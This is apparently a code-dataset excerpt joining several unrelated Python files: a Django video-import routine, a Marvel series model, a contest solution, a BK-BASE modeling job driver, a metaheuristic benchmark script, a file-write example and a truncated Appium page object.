            # Rename the (single) exported video file to <new pk>.mp4.
            old_video_path = [fname for fname in glob.glob("{}/video/*.mp4".format(self.root))][0]
            new_video_path = "{}/video/{}.mp4".format(self.root, self.video.pk)
            os.rename(old_video_path, new_video_path)
        # Order matters: events first (other rows reference event pks), then
        # segments/frames/regions, then index entries and labels.
        self.import_events()
        self.import_segments()
        self.bulk_import_frames()
        self.convert_regions_files()
        self.import_index_entries()
        self.import_labels()
        self.import_region_labels()
        self.import_frame_labels()
        self.import_segment_labels()
        self.import_tube_labels()
        self.import_video_labels()
    def import_labels(self):
        """Get-or-create Label rows and record the old->new pk mapping."""
        for l in self.json.get('labels', []):
            dl, _ = Label.objects.get_or_create(name=l['name'], set=l.get('set', ''))
            self.label_to_pk[l['id']] = dl.pk
    def import_region_labels(self):
        """Bulk-create RegionLabel rows with remapped frame/region/label pks."""
        region_labels = []
        for rl in self.json.get('region_label_list', []):
            drl = RegionLabel()
            drl.frame_id = self.frame_to_pk[rl['frame']]
            drl.region_id = self.region_to_pk[rl['region']]
            drl.video_id = self.video.pk
            if 'event' in rl:
                drl.event_id = self.event_to_pk[rl['event']]
            drl.frame_index = rl['frame_index']
            drl.segment_index = rl['segment_index']
            drl.label_id = self.label_to_pk[rl['label']]
            region_labels.append(drl)
        RegionLabel.objects.bulk_create(region_labels, 1000)
    def import_frame_labels(self):
        """Bulk-create FrameLabel rows with remapped frame/label pks."""
        frame_labels = []
        for fl in self.json.get('frame_label_list', []):
            dfl = FrameLabel()
            dfl.frame_id = self.frame_to_pk[fl['frame']]
            dfl.video_id = self.video.pk
            if 'event' in fl:
                dfl.event_id = self.event_to_pk[fl['event']]
            dfl.frame_index = fl['frame_index']
            dfl.segment_index = fl['segment_index']
            dfl.label_id = self.label_to_pk[fl['label']]
            frame_labels.append(dfl)
        FrameLabel.objects.bulk_create(frame_labels, 1000)
    def import_segment_labels(self):
        """Bulk-create SegmentLabel rows with remapped segment/label pks."""
        segment_labels = []
        for sl in self.json.get('segment_label_list', []):
            dsl = SegmentLabel()
            dsl.video_id = self.video.pk
            if 'event' in sl:
                dsl.event_id = self.event_to_pk[sl['event']]
            dsl.segment_id = self.segment_to_pk[sl['segment']]
            dsl.segment_index = sl['segment_index']
            dsl.label_id = self.label_to_pk[sl['label']]
            segment_labels.append(dsl)
        SegmentLabel.objects.bulk_create(segment_labels, 1000)
    def import_video_labels(self):
        """Bulk-create VideoLabel rows with remapped label pks."""
        video_labels = []
        for vl in self.json.get('video_label_list', []):
            dvl = VideoLabel()
            dvl.video_id = self.video.pk
            if 'event' in vl:
                dvl.event_id = self.event_to_pk[vl['event']]
            dvl.label_id = self.label_to_pk[vl['label']]
            video_labels.append(dvl)
        VideoLabel.objects.bulk_create(video_labels, 1000)
    def import_tube_labels(self):
        """Bulk-create TubeLabel rows with remapped tube/label pks."""
        tube_labels = []
        for tl in self.json.get('tube_label_list', []):
            dtl = TubeLabel()
            dtl.video_id = self.video.pk
            if 'event' in tl:
                dtl.event_id = self.event_to_pk[tl['event']]
            dtl.label_id = self.label_to_pk[tl['label']]
            dtl.tube_id = self.tube_to_pk[tl['tube']]
            tube_labels.append(dtl)
        TubeLabel.objects.bulk_create(tube_labels, 1000)
    def import_segments(self):
        """Bulk-create Segment rows and record the old->new pk mapping."""
        old_ids = []
        segments = []
        for s in self.json.get('segment_list', []):
            old_ids.append(s['id'])
            segments.append(self.create_segment(s))
        segment_ids = Segment.objects.bulk_create(segments, 1000)
        for i, k in enumerate(segment_ids):
            self.segment_to_pk[old_ids[i]] = k.id
    def create_segment(self, s):
        """Build an unsaved Segment from an exported segment dict."""
        ds = Segment()
        ds.video_id = self.video.pk
        ds.segment_index = s.get('segment_index', '-1')
        ds.start_time = s.get('start_time', 0)
        ds.framelist = s.get('framelist', {})
        ds.end_time = s.get('end_time', 0)
        ds.metadata = s.get('metadata', "")
        if s.get('event', None):
            ds.event_id = self.event_to_pk[s['event']]
        ds.frame_count = s.get('frame_count', 0)
        ds.start_index = s.get('start_index', 0)
        return ds
    def import_events(self):
        """Bulk-create TEvent rows, then restore parent/child links using the
        old->new pk mapping."""
        old_ids = []
        children_ids = defaultdict(list)
        events = []
        for e in self.json.get('event_list', []):
            old_ids.append(e['id'])
            if 'parent' in e:
                children_ids[e['parent']].append(e['id'])
            events.append(create_event(e, self.video))
        event_ids = TEvent.objects.bulk_create(events, 1000)
        for i, k in enumerate(event_ids):
            self.event_to_pk[old_ids[i]] = k.id
        for old_id in old_ids:
            parent_id = self.event_to_pk[old_id]
            for child_old_id in children_ids[old_id]:
                ce = TEvent.objects.get(pk=self.event_to_pk[child_old_id])
                ce.parent_id = parent_id
                ce.save()
    def convert_regions_files(self):
        """Rename exported region JPEGs from their old pks to the new ones."""
        if os.path.isdir('{}/detections/'.format(self.root)):
            source_subdir = 'detections'  # temporary for previous version imports
            os.mkdir('{}/regions'.format(self.root))
        else:
            source_subdir = 'regions'
        convert_list = []
        for k, v in self.region_to_pk.iteritems():
            dd = Region.objects.get(pk=v)
            original = '{}/{}/{}.jpg'.format(self.root, source_subdir, k)
            temp_file = "{}/regions/d_{}.jpg".format(self.root, v)
            converted = "{}/regions/{}.jpg".format(self.root, v)
            if dd.materialized or os.path.isfile(original):
                # Two-phase rename through a temp name so old and new pk
                # ranges cannot collide mid-way.
                try:
                    os.rename(original, temp_file)
                except OSError:  # was a bare except: that masked the real error
                    raise ValueError("could not copy {} to {}".format(original, temp_file))
                convert_list.append((temp_file, converted))
        for temp_file, converted in convert_list:
            os.rename(temp_file, converted)
    def import_index_entries(self):
        """Recreate IndexEntries rows, remapping the frame/region pks stored
        inside each entry payload."""
        for i in self.json['index_entries_list']:
            di = IndexEntries()
            di.video = self.video
            di.algorithm = i['algorithm']
            # defaults only for backward compatibility
            if 'indexer_shasum' in i:
                di.indexer_shasum = i['indexer_shasum']
            elif i['algorithm'] in self.name_to_shasum:
                di.indexer_shasum = self.name_to_shasum[i['algorithm']]
            else:
                di.indexer_shasum = 'UNKNOWN'
            if 'approximator_shasum' in i:
                di.approximator_shasum = i['approximator_shasum']
            di.count = i['count']
            di.contains_detections = i['contains_detections']
            di.contains_frames = i['contains_frames']
            di.approximate = i['approximate']
            di.created = i['created']
            di.features_file_name = i['features_file_name']
            # Newer exports keep entries in a side file under indexes/.
            if 'entries_file_name' in i:
                entries = json.load(file('{}/indexes/{}'.format(self.root, i['entries_file_name'])))
            else:
                entries = i['entries']
            di.detection_name = i['detection_name']
            di.metadata = i.get('metadata', {})
            transformed = []
            for entry in entries:
                entry['video_primary_key'] = self.video.pk
                if 'detection_primary_key' in entry:
                    entry['detection_primary_key'] = self.region_to_pk[entry['detection_primary_key']]
                if 'frame_primary_key' in entry:
                    entry['frame_primary_key'] = self.frame_to_pk[entry['frame_primary_key']]
                transformed.append(entry)
            di.entries = transformed
            di.save()
    def bulk_import_frames(self):
        """Bulk-create frames then their regions (in 1000-row batches),
        recording old->new pk mappings for both."""
        frame_regions = defaultdict(list)
        frames = []
        frame_index_to_fid = {}
        for i, f in enumerate(self.json['frame_list']):
            frames.append(self.create_frame(f))
            frame_index_to_fid[i] = f['id']
            if 'region_list' in f:
                for a in f['region_list']:
                    ra = self.create_region(a)
                    # Only detections need their old pk tracked (for file renames).
                    if ra.region_type == Region.DETECTION:
                        frame_regions[i].append((ra, a['id']))
                    else:
                        frame_regions[i].append((ra, None))
            elif 'detection_list' in f or 'annotation_list' in f:
                raise NotImplementedError("Older format no longer supported")
        bulk_frames = Frame.objects.bulk_create(frames)
        regions = []
        regions_index_to_rid = {}
        region_index = 0
        bulk_regions = []
        for i, k in enumerate(bulk_frames):
            self.frame_to_pk[frame_index_to_fid[i]] = k.id
            for r, rid in frame_regions[i]:
                r.frame_id = k.id
                regions.append(r)
                regions_index_to_rid[region_index] = rid
                region_index += 1
                if len(regions) == 1000:
                    bulk_regions.extend(Region.objects.bulk_create(regions))
                    regions = []
        bulk_regions.extend(Region.objects.bulk_create(regions))
        regions = []
        for i, k in enumerate(bulk_regions):
            if regions_index_to_rid[i]:
                self.region_to_pk[regions_index_to_rid[i]] = k.id
    def create_region(self, a):
        """Build an unsaved Region from an exported region dict, handling
        legacy key names (metadata_text/metadata_json, parent_* indexes)."""
        da = Region()
        da.video_id = self.video.pk
        da.x = a['x']
        da.y = a['y']
        da.h = a['h']
        da.w = a['w']
        da.vdn_key = a['id']
        if 'text' in a:
            da.text = a['text']
        elif 'metadata_text' in a:
            da.text = a['metadata_text']
        if 'metadata' in a:
            da.metadata = a['metadata']
        elif 'metadata_json' in a:
            da.metadata = a['metadata_json']
        da.materialized = a.get('materialized', False)
        da.png = a.get('png', False)
        da.region_type = a['region_type']
        da.confidence = a['confidence']
        da.object_name = a['object_name']
        da.full_frame = a['full_frame']
        if a.get('event', None):
            da.event_id = self.event_to_pk[a['event']]
        if 'parent_frame_index' in a:
            da.frame_index = a['parent_frame_index']
        else:
            da.frame_index = a['frame_index']
        if 'parent_segment_index' in a:
            da.segment_index = a.get('parent_segment_index', -1)
        else:
            da.segment_index = a.get('segment_index', -1)
        return da
    def create_frame(self, f):
        """Build an unsaved Frame from an exported frame dict."""
        df = Frame()
        df.video_id = self.video.pk
        df.name = f['name']
        df.frame_index = f['frame_index']
        df.subdir = f['subdir']
        df.h = f.get('h', 0)
        df.w = f.get('w', 0)
        df.t = f.get('t', 0)
        if f.get('event', None):
            df.event_id = self.event_to_pk[f['event']]
        df.segment_index = f.get('segment_index', 0)
        df.keyframe = f.get('keyframe', False)
        return df
def import_tubes(tubes, video_obj):
    """Import exported tubes into *video_obj*.

    :param tubes: iterable of serialized tube dicts
    :param video_obj: target Video instance
    :raises NotImplementedError: always; tube import is not implemented yet
    """
    # TODO: Implement this
    raise NotImplementedError
| [
"[email protected]"
] | |
a17d7cd9fdcdc856d383afb6531cce96e9bb9932 | 1ff376da81912600e0f8b3d45ea061d9418a654c | /backend/weeklypulls/apps/series/models.py | 219c094f4f48347bc1312ed8e9e5114862031b13 | [] | no_license | rkuykendall/weeklypulls | 9c3448665b3a18cc0375ad40a60ad71008bb4e89 | e8300a6f28f6ce959130865e8bcf8c365033b2ce | refs/heads/master | 2021-01-17T19:51:43.702126 | 2017-12-18T12:16:28 | 2017-12-18T12:16:28 | 61,999,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,704 | py | import os
from django.db import models
from django.contrib.postgres.fields import ArrayField
import marvelous
from weeklypulls.apps.marvel.models import DjangoCache
class Series(models.Model):
    """A Marvel comic series the user follows, with read/skipped issue lists."""
    # Marvel API identifier for the series.
    series_id = models.IntegerField(unique=True)
    # Marvel comic ids the user has read / deliberately skipped.
    read = ArrayField(models.IntegerField(), default=list)
    skipped = ArrayField(models.IntegerField(), default=list)
    created_at = models.DateTimeField(auto_now_add=True)
    class Meta:
        verbose_name_plural = "series"
    def __str__(self):
        # Best effort: the title requires a live Marvel API call via self.api,
        # so fall back to the bare id on any failure.
        try:
            return '{} ({})'.format(self.api['title'], self.series_id)
        except Exception:
            return 'Series {} (api error)'.format(self.series_id)
    @property
    def api(self):
        """Fetch series details and its comics from the Marvel API.

        Requires the MAPI_PUBLIC_KEY / MAPI_PRIVATE_KEY environment variables;
        responses are cached through DjangoCache. Each access performs network
        calls (subject to that cache).
        """
        public_key = os.environ['MAPI_PUBLIC_KEY']
        private_key = os.environ['MAPI_PRIVATE_KEY']
        cache = DjangoCache()
        marvel_api = marvelous.api(public_key, private_key, cache=cache)
        series = marvel_api.series(self.series_id)
        response = {
            'title': series.title,
            'comics': [],
            'series_id': self.series_id,
        }
        # Plain comic issues only, no variants; API page size 100.
        series_args = {
            'format': "comic",
            'formatType': "comic",
            'noVariants': True,
            'limit': 100,
        }
        for comic in series.comics(series_args):
            response['comics'].append({
                'id': comic.id,
                'title': comic.title,
                'read': (comic.id in self.read),
                'skipped': (comic.id in self.skipped),
                'on_sale': comic.dates.on_sale,
                'series_id': comic.series.id,
                'images': comic.images,
            })
        return response
| [
"[email protected]"
] | |
9b7d397ba307c03c0cd50292f30ea2770a2a8816 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02623/s581456736.py | db739a5bab8b529088885d50f94a895ce4eb8e86 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | n, m, k = map(int, input().split())
# Two stacks of books with reading times a (n books) and b (m books); pick a
# prefix of each so the total time is <= k, maximizing the number of books.
a = list(map(int, input().split()))
b = list(map(int, input().split()))
a_num = 0
b_num = 0
book_num = 0
passed_k = 0
# Greedily take the longest affordable prefix of a...
for i in range(n):
    if a[i] + passed_k <= k:
        a_num += 1
        passed_k += a[i]
    else:
        break
# ...then extend with as much of b as still fits.
for i in range(m):
    if b[i] + passed_k <= k:
        b_num += 1
        passed_k += b[i]
    else:
        break
book_num = a_num + b_num
# Two-pointer sweep: repeatedly give back the last a-book taken and use the
# freed budget to extend the b prefix, tracking the best combined count.
while a_num > 0:
    passed_k -= a[a_num - 1]
    a_num -= 1
    while b_num < m:
        if passed_k + b[b_num] <= k:
            passed_k += b[b_num]
            b_num += 1
        else:
            break
    book_num = max(book_num, a_num + b_num)
    # Once all of b fits, dropping more a-books can only lower the total.
    if b_num == m:
        break
print(book_num) | [
"[email protected]"
] | |
d0ab779d19449025bfcd4a9b8f4ae12d101f3ed3 | a63d907ad63ba6705420a6fb2788196d1bd3763c | /src/api/dataflow/modeling/job/job_driver.py | fb79d2645b77791a5e854507749137ec274c3ec8 | [
"MIT"
] | permissive | Tencent/bk-base | a38461072811667dc2880a13a5232004fe771a4b | 6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2 | refs/heads/master | 2022-07-30T04:24:53.370661 | 2022-04-02T10:30:55 | 2022-04-02T10:30:55 | 381,257,882 | 101 | 51 | NOASSERTION | 2022-04-02T10:30:56 | 2021-06-29T06:10:01 | Python | UTF-8 | Python | false | false | 10,200 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
import uuid
from dataflow.batch.api.api_helper import BksqlHelper
from dataflow.batch.handlers.processing_batch_info import ProcessingBatchInfoHandler
from dataflow.batch.handlers.processing_job_info import ProcessingJobInfoHandler
from dataflow.modeling.api.api_helper import ModelingApiHelper
from dataflow.modeling.job.jobnavi_register_modeling import ModelingJobNaviRegister
from dataflow.modeling.settings import PARSED_TASK_TYPE, TABLE_TYPE
from dataflow.shared.log import modeling_logger as logger
from dataflow.shared.meta.result_table.result_table_helper import ResultTableHelper
from dataflow.shared.storekit.storekit_helper import StorekitHelper
from dataflow.udf.functions import function_driver
def register_schedule(job_id, schedule_time, created_by, is_restart=False):
    """Register the modeling job on jobnavi and return the registration result.

    The offline (batch) layer already re-wraps the related operations, so this
    helper can stay very thin.
    """
    registrar = ModelingJobNaviRegister(job_id, created_by, is_restart)
    return registrar.register_jobnavi(schedule_time)
def get_output_info(node_info):
    """Extract the output table name, field list and alias from the frontend
    payload.

    The physical table may not exist yet at this point, so we must parse the
    request payload instead of consulting ResultTableHelper/storage APIs.
    If several output tables are present, fields accumulate across all of them
    while name/alias come from the last one iterated.
    """
    table_name = None
    table_alias = None
    fields = []
    for table_id, table_conf in node_info["output"].items():
        table_name = table_id
        table_alias = table_conf["table_alias"]
        for field in table_conf["fields"]:
            logger.info(field)
            fields.append({
                "field": field["field_name"],
                "type": field["field_type"],
                "description": field["field_alias"],
                "origin": [],
            })
    return {"name": table_name, "fields": fields, "alias": table_alias}
def get_input_info(dependence_info):
    """Build the input-table descriptor (name, fields, HDFS storage info) for
    the tables listed in *dependence_info*.

    Fixes: the local previously named ``input`` shadowed the builtin, and the
    ``input_fileds``/``filed_info`` typos are corrected (locals only — the
    returned dict keys are unchanged). If several tables are listed, fields
    accumulate while name/storage come from the last one iterated.
    """
    input_table = None
    input_fields = []
    storage_info = {}
    for table_id in dependence_info:
        input_table = table_id
        result_table_fields = ResultTableHelper.get_result_table_fields(input_table)
        for field_info in result_table_fields:
            input_fields.append({
                "field": field_info["field_name"],
                "type": field_info["field_type"],
                "origin": "",
                "description": field_info["field_alias"],
            })
        result_table_storage = ResultTableHelper.get_result_table_storage(input_table, "hdfs")["hdfs"]
        storage_info["type"] = "hdfs"
        storage_info["format"] = result_table_storage["data_type"]
        result_table_connect = json.loads(result_table_storage["storage_cluster"]["connection_info"])
        storage_info["path"] = "{hdfs_url}/{hdfs_path}".format(
            hdfs_url=result_table_connect["hdfs_url"],
            hdfs_path=result_table_storage["physical_table_name"],
        )
        storage_info["table_type"] = TABLE_TYPE.RESULT_TABLE.value
        # Iceberg-backed tables additionally need the HDFS client config.
        if storage_info["format"] == "iceberg":
            iceberg_hdfs_config = StorekitHelper.get_hdfs_conf(input_table)
            storage_info["iceberg_config"] = {
                "physical_table_name": result_table_storage["physical_table_name"],
                "hdfs_config": iceberg_hdfs_config,
            }
    return {"name": input_table, "fields": input_fields, "info": storage_info}
def get_window_info(input_table, dependence_info, node_info):
    """Merge the dependence config of *input_table* with the current node's
    schedule_info into one window dict.

    Computing the real data path needs both the per-parent dependence config
    and the node's own scheduling config, so every source table gets one
    merged window dict. schedule_info describes the current node (not its
    parent) and is identical across sources; its keys win on conflict.
    """
    merged = dict(dependence_info[input_table])
    merged.update(node_info["schedule_info"])
    return merged
def update_process_and_job(table_name, processor_logic, submit_args):
    """
    Push new processor logic and submit args into every batch processing
    record and every job record whose id starts with ``table_name``.

    :param table_name: result-table prefix used to look up records
    :param processor_logic: new processor logic payload
    :param submit_args: new submit arguments payload
    :return: the ``table_name`` that was updated
    """
    # Refresh the processing records first.
    for proc in ProcessingBatchInfoHandler.get_proc_batch_info_by_prefix(table_name):
        ProcessingBatchInfoHandler.update_proc_batch_info_logic(proc.processing_id, processor_logic)
        ProcessingBatchInfoHandler.update_proc_batch_info_submit_args(proc.processing_id, submit_args)
    # Then rewrite the serialized config of every matching job.
    for job in ProcessingJobInfoHandler.get_proc_job_info_by_prefix(table_name):
        config = json.loads(job.job_config)
        config["submit_args"] = json.dumps(submit_args)
        config["processor_logic"] = json.dumps(processor_logic)
        ProcessingJobInfoHandler.update_proc_job_info_job_config(job.job_id, config)
    return table_name
def get_sub_query_task(sql, sub_sql, target_entity_name, geog_area_code):
    """
    Wrap the information about a sub-query into a temporary task.

    @param sql: the source MLSQL statement
    @param sub_sql: the sub-query extracted from it
    @param target_entity_name: name of the instance generated by the MLSQL
    @param geog_area_code: area code
    @return: the temporary task information dict
    """
    uuid_str = str(uuid.uuid4())
    # Unique processing id: entity name + first segment of a fresh uuid.
    processing_id = target_entity_name + "_" + uuid_str[0 : uuid_str.find("-")]
    # Resolve every UDF referenced by the sub-query.
    udf_data = function_driver.parse_sql(sub_sql, geog_area_code)
    logger.info("udf data result:" + json.dumps(udf_data))
    udf_name_list = []
    for udf in udf_data:
        udf_name_list.append(udf["name"])
    # Resolve every table referenced by the full statement.
    sub_query_table_names = ModelingApiHelper.get_table_names_by_mlsql_parser({"sql": sql})
    logger.info("sub query table names:" + json.dumps(sub_query_table_names))
    spark_sql_propertiies = {
        "spark.input_result_table": sub_query_table_names,
        "spark.bk_biz_id": target_entity_name[0 : target_entity_name.find("_")],
        "spark.dataflow_udf_function_name": ",".join(udf_name_list),
        "spark.result_table_name": processing_id,
    }
    # Use the SparkSQL parser to derive the sub-query's output fields and SQL.
    spark_sql_parse_result_list = BksqlHelper.spark_sql(sub_sql, spark_sql_propertiies)
    logger.info("spark sql result:" + json.dumps(spark_sql_parse_result_list))
    spark_sql_parse_result = spark_sql_parse_result_list[0]
    sub_query_fields = spark_sql_parse_result["fields"]
    sparksql_query_sql = spark_sql_parse_result["sql"]
    tmp_sub_query_fields = []
    for field in sub_query_fields:
        tmp_sub_query_fields.append(
            {
                "field": field["field_name"],
                "type": field["field_type"],
                "description": field["field_alias"],
                "index": field["field_index"],
                "origins": [""],
            }
        )
    # Resolve every column used in the input of the sub-query.
    sql_columns_result = ModelingApiHelper.get_columns_by_mlsql_parser({"sql": sub_sql})
    logger.info("sql column result:" + json.dumps(sql_columns_result))
    processor = {
        "args": {
            "sql": sparksql_query_sql,
            "format_sql": sql_columns_result["sql"],  # SQL that still contains wildcard characters
        },
        "type": "untrained-run",
        "name": "tmp_processor",
    }
    # Resolve the data time range used by the sub-query (currently unused downstream).
    sql_query_source_result = ModelingApiHelper.get_mlsql_query_source_parser({"sql": sub_sql})
    logger.info("sql query source result:" + json.dumps(sql_query_source_result))
    processor["args"]["time_range"] = sql_query_source_result
    # todo: based on all input tables, check whether each input column exists and drop
    # the missing ones (a missing column is assumed to come from an ``as``/rename);
    # this can be optimized further.
    sql_all_columns = sql_columns_result["columns"]
    sql_exist_columns = []
    for table in sub_query_table_names:
        table_fields = ResultTableHelper.get_result_table_fields(table)
        for field in table_fields:
            sql_exist_columns.append(field["field_name"])
    processor["args"]["column"] = list(set(sql_all_columns).intersection(set(sql_exist_columns)))
    tmp_subquery_task = {
        "table_name": processing_id,
        "fields": tmp_sub_query_fields,
        "parents": sub_query_table_names,
        "processor": processor,
        "interpreter": [],
        "processing_id": processing_id,
        "udfs": udf_data,
        "task_type": PARSED_TASK_TYPE.SUB_QUERY.value,
    }
    return tmp_subquery_task
| [
"[email protected]"
] | |
881bf26ac89b923944c31b113c5a4250cb30de70 | 780c45da6388931381d911499723c5afa8a44036 | /run_test_c30.py | ce1a8a664e0893aa42c5eaf89ed0835150c1a6ad | [
"Apache-2.0"
] | permissive | daitouli/metaheuristics | f9157bd700957072a69c0be03d8d34378533581c | 9d885e4c9e9f39ad22baa9ea5d263d5daa276f88 | refs/heads/master | 2021-02-04T18:40:47.387347 | 2019-09-30T06:51:26 | 2019-09-30T06:51:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,520 | py | import pandas as pd
from models.multiple_solution.swarm_based.ABC import *
from models.multiple_solution.swarm_based.BMO import *
from models.multiple_solution.swarm_based.BOA import *
from models.multiple_solution.swarm_based.EPO import *
from models.multiple_solution.swarm_based.HHO import *
from models.multiple_solution.swarm_based.NMR import *
from models.multiple_solution.swarm_based.PFA import *
from models.multiple_solution.swarm_based.PSO import *
from models.multiple_solution.swarm_based.SFO import *
from models.multiple_solution.swarm_based.SOA import *
from models.multiple_solution.swarm_based.WOA import *
from utils.FunctionUtil import *
## Setting parameters
# Shared problem definition: CEC benchmark C30, 100 dimensions, domain [-100, 100].
root_paras = {
    "problem_size": 100,
    "domain_range": [-100, 100],
    "print_train": True,
    "objective_func": C30
}
# Per-algorithm hyper-parameters; every algorithm runs 500 epochs with 100 agents.
abc_paras = {
    "epoch": 500,
    "pop_size": 100,
    "couple_bees": [16, 4],  # number of bees which provided for good location and other location
    "patch_variables": [5.0, 0.985],  # patch_variables = patch_variables * patch_factor (0.985)
    "sites": [3, 1],  # 3 bees (employed bees, onlookers and scouts), 1 good partition
}
bmo_paras = {
    "epoch": 500,
    "pop_size": 100,
    "bm_teams": 10
}
boa_paras = {
    "epoch": 500,
    "pop_size": 100,
    "c": 0.01,
    "p": 0.8,
    "alpha": [0.1, 0.3]
}
epo_paras = {
    "epoch": 500,
    "pop_size": 100
}
hho_paras = {
    "epoch": 500,
    "pop_size": 100
}
nmr_paras = {
    "pop_size": 100,
    "epoch": 500,
    "bp": 0.75,  # breeding probability
}
pfa_paras = {
    "epoch": 500,
    "pop_size": 100
}
pso_paras = {
    "epoch": 500,
    "pop_size": 100,
    "w_minmax": [0.4, 0.9],  # [0-1] -> [0.4-0.9] Weight of bird
    "c_minmax": [1.2, 1.2]  # [(1.2, 1.2), (0.8, 2.0), (1.6, 0.6)] Effecting of local va global
}
isfo_paras = {
    "epoch": 500,
    "pop_size": 100,  # SailFish pop size
    "pp": 0.1  # the rate between SailFish and Sardines (N_sf = N_s * pp) = 0.25, 0.2, 0.1
}
soa_paras = {
    "epoch": 500,
    "pop_size": 100,
}
woa_paras = {
    "epoch": 500,
    "pop_size": 100
}
## Run model
# Map algorithm name -> instantiated optimiser; all share the same problem (root_paras).
name_model = {
    'BaseABC': BaseABC(root_algo_paras=root_paras, abc_paras=abc_paras),
    'BaseBMO': BaseBMO(root_algo_paras=root_paras, bmo_paras=bmo_paras),
    "AdaptiveBOA": AdaptiveBOA(root_algo_paras=root_paras, boa_paras=boa_paras),
    "BaseEPO": BaseEPO(root_algo_paras=root_paras, epo_paras=epo_paras),
    "BaseHHO": BaseHHO(root_algo_paras=root_paras, hho_paras=hho_paras),
    "LevyNMR": LevyNMR(root_algo_paras=root_paras, nmr_paras=nmr_paras),
    "IPFA": IPFA(root_algo_paras=root_paras, pfa_paras=pfa_paras),
    "BasePSO": BasePSO(root_algo_paras=root_paras, pso_paras=pso_paras),
    "ImprovedSFO": ImprovedSFO(root_algo_paras=root_paras, isfo_paras=isfo_paras),
    "BaseSOA": BaseSOA(root_algo_paras=root_paras, soa_paras=soa_paras),
    "BaoWOA": BaoWOA(root_algo_paras=root_paras, woa_paras=woa_paras)
}
### 1st: way
# list_loss = []
# for name, model in name_model.items():
#     _, loss = model._train__()
#     list_loss.append(loss)
# list_loss = np.asarray(list_loss)
# list_loss = list_loss.T
# np.savetxt("run_test_c30.csv", list_loss, delimiter=",", header=str(name_model.keys()))
### 2nd: way
# Train every optimiser and collect its loss history as one column per algorithm.
list_loss = {}
for name, model in name_model.items():
    _, loss = model._train__()
    list_loss[name] = loss
df = pd.DataFrame(list_loss)
df.to_csv('c30_results.csv')  # saving the dataframe
| [
"[email protected]"
] | |
ed530e3765c93ad395a073bdba2ebcf9db8a922e | 2069ec66ace2e8fb5d55502d1c3ce7fd89f3cdcc | /fp2/example/write.py | 2835c40effeaaa01280a975bc1037885b60af898 | [] | no_license | caimingA/ritsumeiPython | 6812a0233456cf3d5346a63d890f4201160593c5 | bb9c39726dd26fe53f7a41f5367bdab60c36a057 | refs/heads/master | 2022-11-16T22:28:50.274374 | 2020-07-13T14:53:51 | 2020-07-13T14:53:51 | 279,294,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | f = open("yuki.txt", mode="w", encoding="utf-8")
f.write("或冬曇りの午後、わたしは中央線の汽車の窓に一列の山脈を眺めてゐた。")
f.write("山脈は勿論まつ白だつた。")
f.write("が、それは雪と言ふよりも山脈の皮膚に近い色をしてゐた。")
| [
"[email protected]"
] | |
91c38c6e741d31665a613aefbe52b741dad9f2d3 | e2f133885cfcea86a3c06bba2f1d4d165e50c823 | /api_test/main.py | eb2d68962d74199d1e2afd00f96adc2b336a3364 | [] | no_license | JR1QQ4/app_test | e0d9dc25ea03060d17dc7f29f30706ec4b8c16ea | 1c2ab9a5601e94a28f9bfe485e615d22511bb79b | refs/heads/main | 2023-05-25T14:55:53.326377 | 2021-06-08T14:33:52 | 2021-06-08T14:33:52 | 349,760,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,417 | py | #!/usr/bin/python
# -*- coding:utf-8 -*-
from time import sleep
from appium import webdriver
from appium.webdriver.common.mobileby import MobileBy
from appium.webdriver.common.touch_action import TouchAction
from appium.webdriver.extensions.android.gsm import GsmCallActions
from appium.webdriver.webdriver import WebDriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Main:
_driver: WebDriver
_appPackage = "com.xueqiu.android"
_appActivity = ".view.WelcomeActivityAlias"
# _appActivity = ".common.MainActivity"
# 搜索框
_search_input = (MobileBy.ID, "com.xueqiu.android:id/tv_search")
_search_text = (MobileBy.ID, "com.xueqiu.android:id/search_input_text")
# 搜索到的内容
_search_result = (MobileBy.XPATH, '//*[@resource-id="com.xueqiu.android:id/name" and @text="$value"]')
_search_result_first = (MobileBy.ID, 'com.xueqiu.android:id/name')
_result_item = (MobileBy.XPATH, '//*[@resource-id="com.xueqiu.android:id/ll_stock_result_view"]'
'//*[@text="$value"]/../..')
_result_item_code = (MobileBy.XPATH, '//*[@text="$code"]')
_result_price = (MobileBy.XPATH, '//*[@resource-id="com.xueqiu.android:id/ll_stock_result_view"]'
'//*[@text="$value"]/../..//*[@resource-id="com.xueqiu.android:id/current_price"]')
_result_price_with_code = (MobileBy.XPATH, '//*[@text="$code"]/../../..'
'//*[@resource-id="com.xueqiu.android:id/current_price"]')
# 取消搜索
